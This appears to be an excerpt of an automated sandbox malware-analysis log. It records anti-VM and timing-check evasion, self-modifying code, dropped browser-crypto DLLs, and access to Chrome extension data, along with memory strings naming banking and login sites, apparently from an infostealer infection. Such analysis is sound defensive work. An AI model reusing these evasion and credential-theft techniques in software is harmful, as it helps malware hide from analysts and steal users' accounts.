Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E1D6 second address: 96E1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E1DB second address: 96E1E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 96E1E1 second address: 96E1E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 975FA3 second address: 975FBB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F28C4758076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F28C4758076h 0x00000012 ja 00007F28C4758076h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5DF899 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 7820D9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5DD612 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 80E83F instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Special instruction interceptor: First address: 78EE9B instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Special instruction interceptor: First address: 938DEE instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Special instruction interceptor: First address: 95BB2B instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Special instruction interceptor: First address: 78EDF1 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Special instruction interceptor: First address: 9C7D33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 104EE9B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11F8DEE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 121BB2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 104EDF1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1287D33 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Special instruction interceptor: First address: 847CF5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Special instruction interceptor: First address: A17593 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Special instruction interceptor: First address: 847BE2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe Special instruction interceptor: First address: 9F8A4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: C6EB0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: DEBB8D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: E12138 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: E189E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Special instruction interceptor: First address: 29F899 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Special instruction interceptor: First address: 4420D9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Special instruction interceptor: First address: 29D612 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe Special instruction interceptor: First address: 4CE83F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: A1DB18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: A1DBFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: BBC4AB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: BBAC3D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: A1B536 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: BC47C5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 5EBF899 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 60620D9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 5EBD612 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 60EE83F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: A20701 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Special instruction interceptor: First address: A20A55 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 658F899 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 67320D9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 658D612 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Special instruction interceptor: First address: 67BE83F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 4F90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 5230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 7230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 5120000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 5190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Memory allocated: 7190000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\DocumentsECAFHIIJJE.exe Code function: 20_2_04C00C4B rdtsc 20_2_04C00C4B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1621
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 456
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1579
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6356
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3353
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4345
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5514
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe API coverage: 0.3 %
Source: C:\Users\user\Desktop\file.exe TID: 6364 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 6360 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5968 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9188 Thread sleep count: 323 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9188 Thread sleep time: -646323s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9168 Thread sleep count: 1621 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9168 Thread sleep time: -3243621s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9156 Thread sleep count: 456 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9156 Thread sleep time: -13680000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8956 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9180 Thread sleep count: 1579 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 9180 Thread sleep time: -3159579s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe TID: 8776 Thread sleep time: -210000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8016 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 6580 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6432 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe TID: 1896 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 3668 Thread sleep time: -270000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 8156 Thread sleep time: -72000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe TID: 3528 Thread sleep count: 66 > 30
Source: C:\Users\user\AppData\Local\Temp\1005643001\3160604f40.exe TID: 3528 Thread sleep time: -396000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe TID: 3660 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe TID: 7516 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1005627001\file1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1005642001\4136f86ac7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\DocumentsECAFHIIJJE.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc, 0_2_6C63C930
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1005645001\0ac2a0f3ae.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: powershell.exe, 00000019.00000002.2934398498.0000000008374000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}J
Source: powershell.exe, 00000019.00000002.2953541557.000000000A9FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter@\]q
Source: skotes.exe, 00000017.00000002.3297166595.00000000014C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASSOCIATORS OF {\\.\ROOT\Microsoft\Windows\Storage:MSFT_Partition.ObjectId="{1}\\\\user-PC\\root/Microsoft/Windows/Storage/Providers_v2\\WSP_Partition.ObjectId=\"{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\\\?\\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\""} WHERE AssocClass = MSFT_DiskToPartition ResultClass = MSFT_Disk ResultRole = Disk Role = Partition
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FD0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Vand (@('ByTargetPort') -cMSFT_NetEventVmNetworkAdatper.format.ps1xmlocia
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D18000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file1.exe, 00000018.00000002.2881058680.00000000012EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\WSP_Disk.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:DI:\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"
Source: file.exe, 00000000.00000002.2412929391.0000000001122000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2412929391.00000000010F2000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000017.00000002.3297166595.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, file1.exe, 00000018.00000002.2881058680.000000000128E000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2866249485.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D8F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000019.00000002.2935729480.00000000083A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareESXi
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AD4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware0
Source: powershell.exe, 00000019.00000002.2933297668.00000000082C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AccessRightFullModifyReadCustomStorageTierClassMicrosoft.PowerShell.Cmdletization.GeneratedTypes.FileStorageTierCapacityPerformancePinnedStatePinnedUnpinnedAllTypeMicrosoft.PowerShell.Cmdletization.GeneratedTypes.InitiatorIdPortWWNNodeWWNHostnameiSCSINameSwitchWWNSASAddressHostTypeStandardSolarisHPUXOpenVMSTru64NetwareSequentAIXDGUXDynixIrixCiscoISCSIStorageRouterLinuxMicrosoftWindowsOS400TRESPASSHIUXVMwareESXiMicrosoftWindowsServer2008MicrosoftWindowsServer2003PortTypeMicrosoft.PowerShell.Cmdletization.GeneratedTypes.InitiatorPortNotPresentFabricPublicLoopFLPortFabricPortFabricExpansionPortGenericFabricPortPrivateLoopPointToPointConnectionTypeOperationalUserOfflineBypassedInDiagnosticsModeLinkDownPortErrorLoopbackMicrosoft.PowerShell.Cmdletization.GeneratedTypes.MaskingSetDeviceAccessMicrosoft.PowerShell.Cmdletization.GeneratedTypes.MaskingSet.AddVirtualDiskNoAccessParityLayout52110.111Z0
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: powershell.exe, 00000019.00000002.2934439928.000000000837B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: powershell.exe, 00000019.00000002.2953541557.000000000A9FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter@\]q
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: powershell.exe, 00000019.00000002.2894050768.00000000055DB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: <Value Name="VMwareESXi" Value="19" />
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D64000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP_
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: powershell.exe, 00000019.00000002.2917317847.0000000006E41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: {1}\\user-PC\root/Microsoft/Windows/Storage/Providers_v2\WSP_Partition.ObjectId="{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}"-
Source: powershell.exe, 00000019.00000002.2918127173.0000000006FE0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\.\ROOT\Microsoft\Windows\Storage:MSFT_Partition.ObjectId="{1}\\\\user-PC\\root/Microsoft/Windows/Storage/Providers_v2\\WSP_Partition.ObjectId=\"{a33c734b-61ca-11ee-8c18-806e6f6e6963}:PR:{00000000-0000-0000-0000-500700000000}\\\\?\\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}\""
Source: 3160604f40.exe, 0000001F.00000002.2929444481.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware<6
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: skotes.exe, skotes.exe, 00000017.00000002.3291976640.00000000011D6000.00000040.00000001.01000000.0000000E.sdmp, file1.exe, 00000018.00000002.2876972921.00000000009CE000.00000040.00000001.01000000.0000000F.sdmp, 4136f86ac7.exe, 0000001E.00000002.3116078239.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp, 4136f86ac7.exe, 0000001E.00000002.3129252471.0000000006044000.00000040.00000800.00020000.00000000.sdmp, 3160604f40.exe, 0000001F.00000002.2927433701.0000000000424000.00000040.00000001.01000000.00000013.sdmp, 0ac2a0f3ae.exe, 00000024.00000002.3120888781.0000000000B9D000.00000040.00000001.01000000.00000019.sdmp, 4136f86ac7.exe, 00000025.00000002.3258230937.0000000000DF3000.00000040.00000001.01000000.00000012.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: powershell.exe, 00000019.00000002.2934398498.0000000008374000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000019.00000002.2894050768.00000000046C3000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 19 { "VMware ESXi" }
Source: 4136f86ac7.exe, 0000001E.00000002.3114512417.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2993729821.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, 4136f86ac7.exe, 0000001E.00000003.2865659588.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW.
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: powershell.exe, 00000019.00000002.2953541557.000000000A9FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter@\]q
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 4136f86ac7.exe, 00000025.00000003.3056712909.0000000005D13000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
